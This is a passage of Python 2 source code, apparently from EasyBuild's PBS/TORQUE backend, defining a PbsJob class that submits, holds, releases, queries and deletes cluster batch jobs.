res[np] += 1
if not res:
raise EasyBuildError("Could not guess the ppn value of a full node because " +
"there are no free or job-exclusive nodes.")
# return most frequent
freq_count, freq_np = max([(j, i) for i, j in res.items()])
self.log.debug("Found most frequent np %s (%s times) in interesting nodes %s" % (freq_np, freq_count, interesting_nodes))
self._ppn = freq_np
return self._ppn
ppn = property(_get_ppn)
def make_job(self, script, name, env_vars=None, hours=None, cores=None):
"""Create and return a `PbsJob` object with the given parameters."""
return PbsJob(self, script, name, env_vars=env_vars, hours=hours, cores=cores, conn=self.conn, ppn=self.ppn)
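# Hedged usage sketch (not taken from EasyBuild documentation): the intended
# flow for this backend is init() -> make_job() -> queue() -> complete().
# Script contents and job names below are placeholders.
#
#   backend = PbsPython()
#   backend.init()
#   job = backend.make_job("echo hello", "eb-test-job", hours=1, cores=1)
#   backend.queue(job)
#   backend.complete()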
class PbsJob(object):
"""Interaction with TORQUE"""
def __init__(self, server, script, name, env_vars=None,
hours=None, cores=None, conn=None, ppn=None):
"""
create a new Job to be submitted to PBS
env_vars is a dictionary with key-value pairs of environment variables that should be passed on to the job
hours and cores should be integer values.
hours can be 1 - (max walltime), cores depends on which cluster it is being run.
"""
self.log = fancylogger.getLogger(self.__class__.__name__, fname=False)
self._server = server
self.script = script
if env_vars:
self.env_vars = env_vars.copy()
else:
self.env_vars = {}
self.name = name
try:
self.pbsconn = self._server.connect_to_server()
except Exception, err:
raise EasyBuildError("Failed to connect to the default pbs server: %s", err)
# setup the resources requested
# validate requested resources!
max_walltime = build_option('job_max_walltime')
if hours is None:
hours = max_walltime
if hours > max_walltime:
            self.log.warn("Specified %s hours, which exceeds the maximum walltime; resetting to %s hours" % (hours, max_walltime))
hours = max_walltime
if ppn is None:
max_cores = server.ppn
else:
max_cores = ppn
if cores is None:
cores = max_cores
if cores > max_cores:
self.log.warn("number of requested cores (%s) was greater than available (%s) " % (cores, max_cores))
cores = max_cores
# only allow cores and hours for now.
self.resources = {
'walltime': '%s:00:00' % hours,
'nodes': '1:ppn=%s' % cores,
}
# don't specify any queue name to submit to, use the default
self.queue = None
# job id of this job
self.jobid = None
# list of dependencies for this job
self.deps = []
# list of holds that are placed on this job
self.holds = []
def __str__(self):
"""Return the job ID as a string."""
return (str(self.jobid) if self.jobid is not None
else repr(self))
def add_dependencies(self, jobs):
"""
Add dependencies to this job.
Argument `jobs` is a sequence of `PbsJob` objects.
"""
self.deps.extend(jobs)
def _submit(self):
"""Submit the jobscript txt, set self.jobid"""
txt = self.script
self.log.debug("Going to submit script %s" % txt)
# Build default pbs_attributes list
pbs_attributes = pbs.new_attropl(3)
pbs_attributes[0].name = pbs.ATTR_N # Job_Name
pbs_attributes[0].value = self.name
output_dir = build_option('job_output_dir')
pbs_attributes[1].name = pbs.ATTR_o
pbs_attributes[1].value = os.path.join(output_dir, '%s.o$PBS_JOBID' % self.name)
pbs_attributes[2].name = pbs.ATTR_e
pbs_attributes[2].value = os.path.join(output_dir, '%s.e$PBS_JOBID' % self.name)
# set resource requirements
resource_attributes = pbs.new_attropl(len(self.resources))
idx = 0
for k, v in self.resources.items():
resource_attributes[idx].name = pbs.ATTR_l # Resource_List
resource_attributes[idx].resource = k
resource_attributes[idx].value = v
idx += 1
pbs_attributes.extend(resource_attributes)
# add job dependencies to attributes
if self.deps:
deps_attributes = pbs.new_attropl(1)
deps_attributes[0].name = pbs.ATTR_depend
deps_attributes[0].value = ",".join(["afterany:%s" % dep.jobid for dep in self.deps])
pbs_attributes.extend(deps_attributes)
self.log.debug("Job deps attributes: %s" % deps_attributes[0].value)
# submit job with (user) hold
hold_attributes = pbs.new_attropl(1)
hold_attributes[0].name = pbs.ATTR_h
hold_attributes[0].value = pbs.USER_HOLD
pbs_attributes.extend(hold_attributes)
self.holds.append(pbs.USER_HOLD)
self.log.debug("Job hold attributes: %s" % hold_attributes[0].value)
# add a bunch of variables (added by qsub)
# also set PBS_O_WORKDIR to os.getcwd()
os.environ.setdefault('WORKDIR', os.getcwd())
defvars = ['MAIL', 'HOME', 'PATH', 'SHELL', 'WORKDIR']
pbsvars = ["PBS_O_%s=%s" % (x, os.environ.get(x, 'NOTFOUND_%s' % x)) for x in defvars]
# extend PBS variables with specified variables
pbsvars.extend(["%s=%s" % (name, value) for (name, value) in self.env_vars.items()])
variable_attributes = pbs.new_attropl(1)
variable_attributes[0].name = pbs.ATTR_v # Variable_List
variable_attributes[0].value = ",".join(pbsvars)
pbs_attributes.extend(variable_attributes)
self.log.debug("Job variable attributes: %s" % variable_attributes[0].value)
# mail settings
mail_attributes = pbs.new_attropl(1)
mail_attributes[0].name = pbs.ATTR_m # Mail_Points
mail_attributes[0].value = 'n' # disable all mail
pbs_attributes.extend(mail_attributes)
self.log.debug("Job mail attributes: %s" % mail_attributes[0].value)
fh, scriptfn = tempfile.mkstemp()
f = os.fdopen(fh, 'w')
self.log.debug("Writing temporary job script to %s" % scriptfn)
f.write(txt)
f.close()
self.log.debug("Going to submit to queue %s" % self.queue)
# job submission sometimes fails without producing an error, e.g. when one of the dependency jobs has already finished
# when that occurs, None will be returned by pbs_submit as job id
jobid = pbs.pbs_submit(self.pbsconn, pbs_attributes, scriptfn, self.queue, NULL)
is_error, errormsg = pbs.error()
if is_error or jobid is None:
raise EasyBuildError("Failed to submit job script %s (job id: %s, error %s)", scriptfn, jobid, errormsg)
else:
            self.log.debug("Successful job submission returned jobid %s" % jobid)
self.jobid = jobid
os.remove(scriptfn)
def set_hold(self, hold_type=None):
"""Set hold on job of specified type."""
# we can't set this default for hold_type in function signature,
# because we need to be able to load this module even when the pbs module is not available
if hold_type is None:
hold_type = pbs.USER_HOLD
# only set hold if it wasn't set before
if hold_type not in self.holds:
if hold_type not in KNOWN_HOLD_TYPES:
raise EasyBuildError("set_hold: unknown hold type: %s (supported: %s)", hold_type, KNOWN_HOLD_TYPES)
# set hold, check for errors, and keep track of this hold
ec = pbs.pbs_holdjob(self.pbsconn, self.jobid, hold_type, NULL)
is_error, errormsg = pbs.error()
if is_error or ec:
raise EasyBuildError("Failed to set hold of type %s on job %s (is_error: %s, exit code: %s, msg: %s)",
hold_type, self.jobid, is_error, ec, errormsg)
else:
self.holds.append(hold_type)
else:
self.log.warning("Hold type %s was already set for %s" % (hold_type, self.jobid))
def release_hold(self, hold_type=None):
"""Release hold on job of specified type."""
# we can't set this default for hold_type in function signature,
# because we need to be able to load this module even when the pbs module is not available
if hold_type is None:
hold_type = pbs.USER_HOLD
# only release hold if it was set
if hold_type in self.holds:
if hold_type not in KNOWN_HOLD_TYPES:
raise EasyBuildError("release_hold: unknown hold type: %s (supported: %s)", hold_type, KNOWN_HOLD_TYPES)
# release hold, check for errors, remove from list of holds
ec = pbs.pbs_rlsjob(self.pbsconn, self.jobid, hold_type, NULL)
self.log.debug("Released hold of type %s for job %s" % (hold_type, self.jobid))
is_error, errormsg = pbs.error()
if is_error or ec:
raise EasyBuildError("Failed to release hold type %s on job %s (is_error: %s, exit code: %s, msg: %s)",
hold_type, self.jobid, is_error, ec, errormsg)
else:
self.holds.remove(hold_type)
else:
self.log.warning("No hold type %s was set for %s, so skipping hold release" % (hold_type, self.jobid))
def has_holds(self):
"""Return whether this job has holds or not."""
return bool(self.holds)
def state(self):
"""
Return the state of the job
State can be 'not submitted', 'running', 'queued' or 'finished',
"""
state = self.info(types=['job_state', 'exec_host'])
if state is None:
if self.jobid is None:
return 'not submitted'
else:
return 'finished'
jid = state['id']
jstate = state.get('job_state', None)
def get_uniq_hosts(txt, num=None):
"""
- txt: format: host1/cpuid+host2/cpuid
- num: number of nodes to return (default: all)
"""
if num is None:
num = -1
res = []
for h_c in txt.split('+'):
h = h_c.split('/')[0]
if h in res:
continue
res.append(h)
return res[:num]
ehosts = get_uniq_hosts(state.get('exec_host', ''), 1)
self.log.debug("Jobid %s jid %s state %s ehosts %s (%s)" % (self.jobid, jid, jstate, ehosts, state))
if jstate == 'Q':
return 'queued'
else:
return 'running'
def info(self, types=None):
"""
Return jobinfo
"""
if not self.jobid:
self.log.debug("no jobid, job is not submitted yet?")
return None
# convert single type into list
if type(types) is str:
types = [types]
self.log.debug("Return info types %s" % types)
# create attribute list to query pbs with
if types is None:
jobattr = NULL
else:
jobattr = pbs.new_attrl(len(types))
for idx, attr in enumerate(types):
jobattr[idx].name = attr
jobs = pbs.pbs_statjob(self.pbsconn, self.jobid, jobattr, NULL)
if len(jobs) == 0:
# no job found, return None info
res = None
self.log.debug("No job found. Wrong id %s or job finished? Returning %s" % (self.jobid, res))
return res
elif len(jobs) == 1:
self.log.debug("Request for jobid %s returned one result %s" % (self.jobid, jobs))
else:
            raise EasyBuildError("Request for jobid %s returned more than one result %s", self.jobid, jobs)
# only expect to have a list with one element
j = jobs[0]
        # convert attribs into a usable dict
job_details = dict([(attrib.name, attrib.value) for attrib in j.attribs])
# manually set 'id' attribute
job_details['id'] = j.name
self.log.debug("Found jobinfo %s" % job_details)
return job_details
def remove(self):
"""Remove the job with id jobid"""
result = pbs.pbs_deljob(self.pbsconn, self.jobid, '') # use empty string, not NULL
if result:
raise EasyBuildError("Failed to delete job %s: error %s", self.jobid, result)
else:
            self.log.debug("Successfully deleted job %s" % self.jobid)
|